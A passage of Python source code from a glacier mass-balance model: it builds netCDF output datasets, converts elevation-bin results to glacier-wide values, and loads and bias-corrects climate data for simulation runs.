            record_name_values = stat_cns
        # Variable coordinates dictionary
        output_coords_dict = {
                'prec_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'temp_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'acc_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'refreeze_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'melt_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'frontalablation_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'massbaltotal_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'runoff_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'snowline_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'area_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
                'volume_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
                'ELA_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year', year_values), (record_name, record_name_values)]),
                'offglac_prec_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_refreeze_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_melt_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_snowpack_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_runoff_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                }
        # Attributes dictionary
        output_attrs_dict = {
                'time': {
                        'long_name': 'date',
                        'year_type':year_type},
                'glac': {
                        'long_name': 'glacier index',
                        'comment': 'glacier index value that refers to the glacier table'},
                'year': {
                        'long_name': 'years',
                        'year_type': year_type,
                        'comment': 'years referring to the start of each year'},
                'year_plus1': {
                        'long_name': 'years plus one additional year',
                        'year_type': year_type,
                        'comment': ('additional year allows one to record glacier dimension changes at end of '
                                    'model run')},
                'sim': {
                        'long_name': 'simulation number',
                        'comment': 'simulation numbers only needed for MCMC methods'},
                'stats': {
                        'long_name': 'variable statistics',
                        'comment': '% refers to percentiles'},
                'temp_glac_monthly': {
                        'long_name': 'glacier-wide mean air temperature',
                        'units': 'degC',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'each elevation bin is weighted equally to compute the mean temperature, and '
                                'bins where the glacier no longer exists due to retreat have been removed')},
                'prec_glac_monthly': {
                        'long_name': 'glacier-wide precipitation (liquid)',
                        'units': 'm',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the liquid precipitation, solid precipitation excluded'},
                'acc_glac_monthly': {
                        'long_name': 'glacier-wide accumulation',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the solid precipitation'},
                'refreeze_glac_monthly': {
                        'long_name': 'glacier-wide refreeze',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'melt_glac_monthly': {
                        'long_name': 'glacier-wide melt',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'frontalablation_glac_monthly': {
                        'long_name': 'glacier-wide frontal ablation',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'mass losses from calving, subaerial frontal melting, sublimation above the '
                                'waterline and subaqueous frontal melting below the waterline')},
                'massbaltotal_glac_monthly': {
                        'long_name': 'glacier-wide total mass balance',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'total mass balance is the sum of the climatic mass balance and frontal '
                                'ablation')},
                'runoff_glac_monthly': {
                        'long_name': 'glacier-wide runoff',
                        'units': 'm**3',
                        'temporal_resolution': 'monthly',
                        'comment': 'runoff from the glacier terminus, which moves over time'},
                'snowline_glac_monthly': {
                        'long_name': 'transient snowline',
                        'units': 'm a.s.l.',
                        'temporal_resolution': 'monthly',
                        'comment': 'transient snowline is altitude separating snow from ice/firn'},
                'area_glac_annual': {
                        'long_name': 'glacier area',
                        'units': 'km**2',
                        'temporal_resolution': 'annual',
                        'comment': 'area used for the duration of the defined start/end of year'},
                'volume_glac_annual': {
                        'long_name': 'glacier volume',
                        'units': 'km**3 ice',
                        'temporal_resolution': 'annual',
                        'comment': 'volume based on area and ice thickness used for that year'},
                'ELA_glac_annual': {
                        'long_name': 'annual equilibrium line altitude',
                        'units': 'm a.s.l.',
                        'temporal_resolution': 'annual',
                        'comment': (
                                'equilibrium line altitude is the elevation where the climatic mass balance is '
                                'zero')},
                'offglac_prec_monthly': {
                        'long_name': 'off-glacier-wide precipitation (liquid)',
                        'units': 'm',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the liquid precipitation, solid precipitation excluded'},
                'offglac_refreeze_monthly': {
                        'long_name': 'off-glacier-wide refreeze',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'offglac_melt_monthly': {
                        'long_name': 'off-glacier-wide melt',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'only melt of snow and refreeze since off-glacier'},
                'offglac_runoff_monthly': {
                        'long_name': 'off-glacier-wide runoff',
                        'units': 'm**3',
                        'temporal_resolution': 'monthly',
                        'comment': 'off-glacier runoff from area where glacier no longer exists'},
                'offglac_snowpack_monthly': {
                        'long_name': 'off-glacier-wide snowpack',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'snow remaining accounting for new accumulation, melt, and refreeze'},
                }
        # Add variables to empty dataset and merge together
        count_vn = 0
        encoding = {}
        noencoding_vn = ['stats', 'glac_attrs']
        for vn in output_variables:
            count_vn += 1
            empty_holder = np.zeros([len(output_coords_dict[vn][i]) for i in list(output_coords_dict[vn].keys())])
            output_ds = xr.Dataset({vn: (list(output_coords_dict[vn].keys()), empty_holder)},
                                   coords=output_coords_dict[vn])
            # Merge datasets of stats into one output
            if count_vn == 1:
                output_ds_all = output_ds
            else:
                output_ds_all = xr.merge((output_ds_all, output_ds))
    # Add a glacier table so that the glaciers attributes accompany the netcdf file
    main_glac_rgi_float = main_glac_rgi[input.output_glacier_attr_vns].copy()
    main_glac_rgi_xr = xr.Dataset({'glacier_table': (('glac', 'glac_attrs'), main_glac_rgi_float.values)},
                                   coords={'glac': glac_values,
                                           'glac_attrs': main_glac_rgi_float.columns.values})
    output_ds_all = output_ds_all.combine_first(main_glac_rgi_xr)
    output_ds_all.glacier_table.attrs['long_name'] = 'RGI glacier table'
    output_ds_all.glacier_table.attrs['comment'] = 'table contains attributes from RGI for each glacier'
    output_ds_all.glac_attrs.attrs['long_name'] = 'RGI glacier attributes'
    # Add attributes
    for vn in output_ds_all.variables:
        # Coordinates/variables without an entry in the attributes dict are left bare;
        # catch only the expected missing-key case instead of a bare except that would
        # mask unrelated errors
        try:
            output_ds_all[vn].attrs = output_attrs_dict[vn]
        except KeyError:
            pass
        # Encoding (specify _FillValue, offsets, etc.)
        if vn not in noencoding_vn:
            encoding[vn] = {'_FillValue': False}
    return output_ds_all, encoding
def convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze,
                             glac_bin_snowpack, glac_bin_melt, glac_bin_frontalablation, glac_bin_massbalclim_annual,
                             glac_bin_area_annual, glac_bin_icethickness_annual):
    """
    Convert raw runmassbalance function output to glacier-wide results for output package 2

    Parameters
    ----------
    elev_bins : numpy array
        elevation of each elevation bin
    glac_bin_temp : numpy array
        temperature for each elevation bin for each timestep
    glac_bin_prec : numpy array
        precipitation (liquid) for each elevation bin for each timestep
    glac_bin_acc : numpy array
        accumulation (solid precipitation) for each elevation bin for each timestep
    glac_bin_refreeze : numpy array
        refreeze for each elevation bin for each timestep
    glac_bin_snowpack : numpy array
        snowpack for each elevation bin for each timestep
    glac_bin_melt : numpy array
        glacier melt for each elevation bin for each timestep
    glac_bin_frontalablation : numpy array
        frontal ablation for each elevation bin for each timestep
    glac_bin_massbalclim_annual : numpy array
        annual climatic mass balance for each elevation bin for each timestep
    glac_bin_area_annual : numpy array
        annual glacier area for each elevation bin for each timestep
    glac_bin_icethickness_annual: numpy array
        annual ice thickness for each elevation bin for each timestep

    Returns
    -------
    glac_wide_temp : np.array
        monthly mean glacier-wide temperature (bins weighted equally)
    glac_wide_prec : np.array
        monthly glacier-wide precipitation (liquid only)
    glac_wide_acc : np.array
        monthly glacier-wide accumulation (solid precipitation only)
    glac_wide_refreeze : np.array
        monthly glacier-wide refreeze
    glac_wide_melt : np.array
        monthly glacier-wide melt
    glac_wide_frontalablation : np.array
        monthly glacier-wide frontal ablation
    glac_wide_massbaltotal : np.array
        monthly glacier-wide total mass balance (climatic mass balance + frontal ablation)
    glac_wide_runoff: np.array
        monthly glacier-wide runoff at the terminus of the glacier
    glac_wide_snowline : np.array
        monthly glacier-wide snowline
    glac_wide_area_annual : np.array
        annual glacier area
    glac_wide_volume_annual : np.array
        annual glacier volume
    glac_wide_ELA_annual : np.array
        annual equilibrium line altitude
    """
    n_timesteps = glac_bin_temp.shape[1]
    # Monthly bin areas: repeat each annual area 12x (drop the extra "year_plus1" column)
    glac_bin_area = glac_bin_area_annual[:,0:glac_bin_area_annual.shape[1]-1].repeat(12,axis=1)
    glac_wide_area = glac_bin_area.sum(axis=0)

    def _area_weighted_mean(glac_bin_var):
        # Glacier-wide mean of a per-bin variable weighted by bin area; zero wherever
        # the area-weighted sum is zero (avoids dividing by zero glacier area)
        var_mkm2 = (glac_bin_var * glac_bin_area).sum(axis=0)
        glac_wide_var = np.zeros(n_timesteps)
        mask = var_mkm2 > 0
        glac_wide_var[mask] = var_mkm2[mask] / glac_wide_area[mask]
        return glac_wide_var

    # Temperature: bins weighted equally (mean over bins with nonzero temperature),
    # consistent with the 'temp_glac_monthly' attribute comment in the output dataset
    glac_wide_temp = np.zeros(n_timesteps)
    glac_wide_temp_sum = glac_bin_temp.sum(axis=0)
    glac_wide_temp_bincount = (glac_bin_temp != 0).sum(axis=0)
    glac_wide_temp[glac_wide_temp_bincount > 0] = (glac_wide_temp_sum[glac_wide_temp_bincount > 0] /
                                                   glac_wide_temp_bincount[glac_wide_temp_bincount > 0])
    # Area-weighted glacier-wide means
    glac_wide_prec = _area_weighted_mean(glac_bin_prec)
    glac_wide_acc = _area_weighted_mean(glac_bin_acc)
    glac_wide_refreeze = _area_weighted_mean(glac_bin_refreeze)
    glac_wide_melt = _area_weighted_mean(glac_bin_melt)
    glac_wide_frontalablation = _area_weighted_mean(glac_bin_frontalablation)
    # Mass balance: climatic (acc + refreeze - melt) minus frontal ablation
    glac_wide_massbalclim = glac_wide_acc + glac_wide_refreeze - glac_wide_melt
    glac_wide_massbaltotal = glac_wide_massbalclim - glac_wide_frontalablation
    glac_wide_runoff = (glac_wide_prec + glac_wide_melt - glac_wide_refreeze) * glac_wide_area * (1000)**2
    #  units: (m + m w.e. - m w.e.) * km**2 * (1000 m / 1 km)**2 = m**3
    # Snowline: elevation of lowest bin with snowpack (argmax returns first True index)
    # NOTE(review): argmax yields an integer array, so assigning elevations into it
    # truncates any fractional part when elev_bins - binsize/2 is not integral — confirm
    # this is acceptable for the chosen binsize
    glac_wide_snowline = (glac_bin_snowpack > 0).argmax(axis=0)
    glac_wide_snowline[glac_wide_snowline > 0] = (elev_bins[glac_wide_snowline[glac_wide_snowline > 0]] -
                                                  input.binsize/2)
    glac_wide_area_annual = glac_bin_area_annual.sum(axis=0)
    glac_wide_volume_annual = (glac_bin_area_annual * glac_bin_icethickness_annual / 1000).sum(axis=0)
    # ELA: elevation of lowest bin with positive climatic mass balance
    glac_wide_ELA_annual = (glac_bin_massbalclim_annual > 0).argmax(axis=0)
    glac_wide_ELA_annual[glac_wide_ELA_annual > 0] = (elev_bins[glac_wide_ELA_annual[glac_wide_ELA_annual > 0]] -
                                                      input.binsize/2)
    # ELA and snowline can't be below minimum elevation
    glac_zmin_annual = elev_bins[(glac_bin_area_annual > 0).argmax(axis=0)][:-1] - input.binsize/2
    glac_wide_ELA_annual[glac_wide_ELA_annual < glac_zmin_annual] = (
            glac_zmin_annual[glac_wide_ELA_annual < glac_zmin_annual])
    glac_zmin = elev_bins[(glac_bin_area > 0).argmax(axis=0)] - input.binsize/2
    glac_wide_snowline[glac_wide_snowline < glac_zmin] = glac_zmin[glac_wide_snowline < glac_zmin]

    return (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
            glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
            glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual)
def main(list_packed_vars):
"""
Model simulation
Parameters
----------
list_packed_vars : list
list of packed variables that enable the use of parallels
Returns
-------
netcdf files of the simulation output (specific output is dependent on the output option)
"""
# Unpack variables
count = list_packed_vars[0]
glac_no = list_packed_vars[1]
regions_str = list_packed_vars[2]
gcm_name = list_packed_vars[3]
parser = getparser()
args = parser.parse_args()
if (gcm_name != input.ref_gcm_name) and (args.rcp is None):
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
elif args.rcp is not None:
rcp_scenario = args.rcp
if debug:
if 'rcp_scenario' in locals():
print(rcp_scenario)
if args.debug_spc == 1:
debug_spc = True
else:
debug_spc = False
# ===== LOAD GLACIERS =====
main_glac_rgi = modelsetup.selectglaciersrgitable(glac_no=glac_no)
# Load glacier data for Huss and Farinotti to avoid repetitively reading the csv file (not needed for OGGM)
if input.hyps_data in ['Huss', 'Farinotti']:
# Glacier hypsometry [km**2], total area
main_glac_hyps = modelsetup.import_Husstable(main_glac_rgi, input.hyps_filepath, input.hyps_filedict,
input.hyps_colsdrop)
# Ice thickness [m], average
main_glac_icethickness = modelsetup.import_Husstable(main_glac_rgi, input.thickness_filepath,
input.thickness_filedict, input.thickness_colsdrop)
main_glac_icethickness[main_glac_icethickness < 0] = 0
main_glac_hyps[main_glac_icethickness == 0] = 0
# Width [km], average
main_glac_width = modelsetup.import_Husstable(main_glac_rgi, input.width_filepath, input.width_filedict,
input.width_colsdrop)
# if input.option_surfacetype_debris == 1:
# main_glac_debrisfactor = modelsetup.import_Husstable(main_glac_rgi, input.debris_fp, input.debris_filedict,
# input.debris_colsdrop)
# else:
# print('\n\nDELETE ME - CHECK THAT THIS IS SAME FORMAT AS MAIN_GLAC_HYPS AND OTHERS\n\n')
# main_glac_debrisfactor = np.zeros(main_glac_hyps.shape) + 1
# main_glac_debrisfactor[main_glac_hyps == 0] = 0
# ===== TIME PERIOD =====
dates_table = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
spinupyears=input.gcm_spinupyears, option_wateryear=input.gcm_wateryear)
# # =================
# if debug:
# # Select dates including future projections
# # - nospinup dates_table needed to get the proper time indices
# dates_table_nospinup = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
# spinupyears=0, option_wateryear=input.gcm_wateryear)
#
# # ===== LOAD CALIBRATION DATA =====
# cal_data = pd.DataFrame()
# for dataset in input.cal_datasets:
# cal_subset = class_mbdata.MBData(name=dataset)
# cal_subset_data = cal_subset.retrieve_mb(main_glac_rgi, main_glac_hyps, dates_table_nospinup)
# cal_data = cal_data.append(cal_subset_data, ignore_index=True)
# cal_data = cal_data.sort_values(['glacno', 't1_idx'])
# cal_data.reset_index(drop=True, inplace=True)
# # =================
# ===== LOAD CLIMATE DATA =====
# Set up climate class
if gcm_name in ['ERA5', 'ERA-Interim', 'COAWST']:
gcm = class_climate.GCM(name=gcm_name)
# Check that end year is reasonable
if (input.gcm_endyear > int(time.strftime("%Y"))) and (input.option_synthetic_sim == 0):
print('\n\nEND YEAR BEYOND AVAILABLE DATA FOR ERA-INTERIM. CHANGE END YEAR.\n\n')
else:
# GCM object
gcm = class_climate.GCM(name=gcm_name, rcp_scenario=rcp_scenario)
# Reference GCM
ref_gcm = class_climate.GCM(name=input.ref_gcm_name)
# Adjust reference dates in event that reference is longer than GCM data
if input.ref_startyear >= input.gcm_startyear:
ref_startyear = input.ref_startyear
else:
ref_startyear = input.gcm_startyear
if input.ref_endyear <= input.gcm_endyear:
ref_endyear = input.ref_endyear
else:
ref_endyear = input.gcm_endyear
dates_table_ref = modelsetup.datesmodelrun(startyear=ref_startyear, endyear=ref_endyear,
spinupyears=input.spinupyears,
option_wateryear=input.ref_wateryear)
# Load climate data
if input.option_synthetic_sim == 0:
# Air temperature [degC]
gcm_temp, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table)
if input.option_ablation != 2:
gcm_tempstd = np.zeros(gcm_temp.shape)
elif input.option_ablation == 2 and gcm_name in ['ERA5']:
gcm_tempstd, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.tempstd_fn, gcm.tempstd_vn,
main_glac_rgi, dates_table)
elif input.option_ablation == 2 and input.ref_gcm_name in ['ERA5']:
# Compute temp std based on reference climate data
ref_tempstd, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.tempstd_fn, ref_gcm.tempstd_vn,
main_glac_rgi, dates_table_ref)
# Monthly average from reference climate data
gcm_tempstd = gcmbiasadj.monthly_avg_array_rolled(ref_tempstd, dates_table_ref, dates_table)
else:
gcm_tempstd = np.zeros(gcm_temp.shape)
# Precipitation [m]
gcm_prec, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
if gcm_name in ['ERA-Interim', 'ERA5']:
gcm_lr, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi, dates_table)
else:
# Compute lapse rates based on reference climate data
ref_lr, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.lr_fn, ref_gcm.lr_vn, main_glac_rgi,
dates_table_ref)
# Monthly average from reference climate data
gcm_lr = gcmbiasadj.monthly_avg_array_rolled(ref_lr, dates_table_ref, dates_table)
# COAWST data has two domains, so need to merge the two domains
if gcm_name == 'COAWST':
gcm_temp_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn_d01, gcm.temp_vn,
main_glac_rgi, dates_table)
gcm_prec_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn_d01, gcm.prec_vn,
main_glac_rgi, dates_table)
gcm_elev_d01 = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn_d01, gcm.elev_vn, main_glac_rgi)
# Check if glacier outside of high-res (d02) domain
for glac in range(main_glac_rgi.shape[0]):
glac_lat = main_glac_rgi.loc[glac,input.rgi_lat_colname]
glac_lon = main_glac_rgi.loc[glac,input.rgi_lon_colname]
if (~(input.coawst_d02_lat_min <= glac_lat <= input.coawst_d02_lat_max) or
~(input.coawst_d02_lon_min <= glac_lon <= input.coawst_d02_lon_max)):
gcm_prec[glac,:] = gcm_prec_d01[glac,:]
gcm_temp[glac,:] = gcm_temp_d01[glac,:]
gcm_elev[glac] = gcm_elev_d01[glac]
# ===== Synthetic Simulation =====
elif input.option_synthetic_sim == 1:
# Synthetic dates table
dates_table_synthetic = modelsetup.datesmodelrun(
startyear=input.synthetic_startyear, endyear=input.synthetic_endyear,
option_wateryear=input.gcm_wateryear, spinupyears=0)
# Air temperature [degC]
gcm_temp_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table_synthetic)
# Precipitation [m]
gcm_prec_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table_synthetic)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
gcm_lr_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
dates_table_synthetic)
# Future simulation based on synthetic (replicated) data; add spinup years; dataset restarts after spinupyears
datelength = dates_table.shape[0] - input.gcm_spinupyears * 12
n_tiles = int(np.ceil(datelength / dates_table_synthetic.shape[0]))
gcm_temp = np.append(gcm_temp_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_temp_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_prec = np.append(gcm_prec_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_prec_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_lr = np.append(gcm_lr_tile[:,:input.gcm_spinupyears*12], np.tile(gcm_lr_tile,(1,n_tiles))[:,:datelength],
axis=1)
# Temperature and precipitation sensitivity adjustments
gcm_temp = gcm_temp + input.synthetic_temp_adjust
gcm_prec = gcm_prec * input.synthetic_prec_factor
# ===== BIAS CORRECTIONS =====
# No adjustments
if input.option_bias_adjustment == 0 or gcm_name == input.ref_gcm_name:
gcm_temp_adj = gcm_temp
gcm_prec_adj = gcm_prec
gcm_elev_adj = gcm_elev
# Bias correct based on reference climate data
else:
# Air temperature [degC], Precipitation [m], Elevation [masl], Lapse rate [K m-1]
ref_temp, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.temp_fn, ref_gcm.temp_vn,
main_glac_rgi, dates_table_ref)
ref_prec, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.prec_fn, ref_gcm.prec_vn,
main_glac_rgi, dates_table_ref)
ref_elev = ref_gcm.importGCMfxnearestneighbor_xarray(ref_gcm.elev_fn, ref_gcm.elev_vn, main_glac_rgi)
# OPTION 1: Adjust temp using Huss and Hock (2015), prec similar but addresses for variance and outliers
if input.option_bias_adjustment == 1:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_opt1(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# OPTION 2: Adjust temp and prec using Huss and Hock (2015)
elif input.option_bias_adjustment == 2:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_HH2015(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# Checks on precipitation data
assert gcm_prec_adj.max() <= 10, 'gcm_prec_adj (precipitation bias adjustment) too high, needs to be modified'
assert gcm_prec_adj.min() >= 0, 'gcm_prec_adj is producing a negative precipitation value'
# ===== RUN MASS BALANCE =====
# Number of simulations
if input.option_calibration == 2:
sim_iters = input.sim_iters
else:
sim_iters = 1
# # Create datasets to store simulations
# output_ds_all, encoding = create_xrdataset(main_glac_rgi, dates_table, sim_iters=sim_iters,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats, encoding = create_xrdataset(main_glac_rgi, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
for glac in range(main_glac_rgi.shape[0]):
if glac == 0 or glac == main_glac_rgi.shape[0]:
print(gcm_name,':', main_glac_rgi.loc[main_glac_rgi.index.values[glac],'RGIId'])
# Select subsets of data
glacier_rgi_table = main_glac_rgi.loc[main_glac_rgi.index.values[glac], :]
glacier_str = '{0:0.5f}'.format(glacier_rgi_table['RGIId_float'])
glacier_gcm_elev = gcm_elev_adj[glac]
glacier_gcm_prec = gcm_prec_adj[glac,:]
glacier_gcm_temp = gcm_temp_adj[glac,:]
glacier_gcm_tempstd = gcm_tempstd[glac,:]
glacier_gcm_lrgcm = gcm_lr[glac,:]
glacier_gcm_lrglac = glacier_gcm_lrgcm.copy()
# ===== Load glacier data: area (km2), ice thickness (m), width (km) =====
if input.hyps_data in ['oggm']:
glac_oggm_df = pd.read_csv(input.oggm_glacierdata_fp + 'RGI60-' + glacier_str + '.csv', index_col=0)
glacier_area_initial = glac_oggm_df['w'].values * glac_oggm_df['dx'].values / 1e6
icethickness_initial = glac_oggm_df['h'].values
width_initial = glac_oggm_df['w'].values / 1e3
elev_bins = glac_oggm_df['z'].values
elif input.hyps_data in ['Huss', 'Farinotti']:
glacier_area_initial = main_glac_hyps.iloc[glac,:].values.astype(float)
icethickness_initial = main_glac_icethickness.iloc[glac,:].values.astype(float)
width_initial = main_glac_width.iloc[glac,:].values.astype(float)
elev_bins = main_glac_hyps.columns.values.astype(int)
# if input.option_surfacetype_debris == 1:
# glacier_debrisfactor = main_glac_debrisfactor.iloc[glac,:].values.astype(float)
# # Empty datasets to record output
# annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
# year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
# year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
# np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# output_temp_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_prec_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_acc_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_refreeze_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_melt_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_frontalablation_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_massbaltotal_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_runoff_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_snowline_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_area_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_volume_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_ELA_glac_annual = np.zeros((year_values.shape[0], sim_iters))
# output_offglac_prec_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_refreeze_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_melt_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_snowpack_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_runoff_monthly = np.zeros((dates_table.shape[0], sim_iters))
if icethickness_initial.max() > 0:
if input.hindcast == 1:
glacier_gcm_prec = glacier_gcm_prec[::-1]
glacier_gcm_temp = glacier_gcm_temp[::-1]
glacier_gcm_lrgcm = glacier_gcm_lrgcm[::-1]
glacier_gcm_lrglac = glacier_gcm_lrglac[::-1]
# # get glacier number
# if glacier_rgi_table.O1Region >= 10:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][6:]
# else:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][7:]
if input.option_import_modelparams == 1:
ds_mp = xr.open_dataset(input.modelparams_fp + glacier_str + '.nc')
cn_subset = input.modelparams_colnames
modelparameters_all = (pd.DataFrame(ds_mp['mp_value'].sel(chain=0).values,
columns=ds_mp.mp.values)[cn_subset])
else:
modelparameters_all = (
pd.DataFrame(np.asarray([input.lrgcm, input.lrglac, input.precfactor, input.precgrad,
input.ddfsnow, input.ddfice, input.tempsnow, input.tempchange])
.reshape(1,-1), columns=input.modelparams_colnames))
# Set the number of iterations and determine every kth iteration to use for the ensemble
if input.option_calibration == 2 and modelparameters_all.shape[0] > 1:
sim_iters = input.sim_iters
# Select every kth iteration
mp_spacing = int((modelparameters_all.shape[0] - input.sim_burn) / sim_iters)
mp_idx_start = np.arange(input.sim_burn, input.sim_burn + mp_spacing)
np.random.shuffle(mp_idx_start)
mp_idx_start = mp_idx_start[0]
mp_idx_all = np.arange(mp_idx_start, modelparameters_all.shape[0], mp_spacing)
else:
sim_iters = 1
# Loop through model parameters
for n_iter in range(sim_iters):
if sim_iters == 1:
modelparameters = modelparameters_all.mean()
else:
mp_idx = mp_idx_all[n_iter]
modelparameters = modelparameters_all.iloc[mp_idx,:]
if debug:
print(glacier_str, ('PF: ' + str(np.round(modelparameters[2],2)) + ' ddfsnow: ' +
str(np.round(modelparameters[4],4)) + ' tbias: ' + str(np.round(modelparameters[7],2))))
print('\n\nDELETE ME! Switch back model parameters\n\n')
modelparameters[2] = 5
modelparameters[7] = -5
print('model params:', modelparameters)
# run mass balance calculation
(glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
glac_bin_frontalablation, glac_bin_massbalclim, glac_bin_massbalclim_annual, glac_bin_area_annual,
glac_bin_icethickness_annual, glac_bin_width_annual, glac_bin_surfacetype_annual,
glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline, glac_wide_snowpack,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual, offglac_wide_prec,
offglac_wide_refreeze, offglac_wide_melt, offglac_wide_snowpack, offglac_wide_runoff) = (
massbalance.runmassbalance(modelparameters[0:8], glacier_rgi_table, glacier_area_initial,
icethickness_initial, width_initial, elev_bins, glacier_gcm_temp,
glacier_gcm_tempstd, glacier_gcm_prec, glacier_gcm_elev,
glacier_gcm_lrgcm, glacier_gcm_lrglac, dates_table,
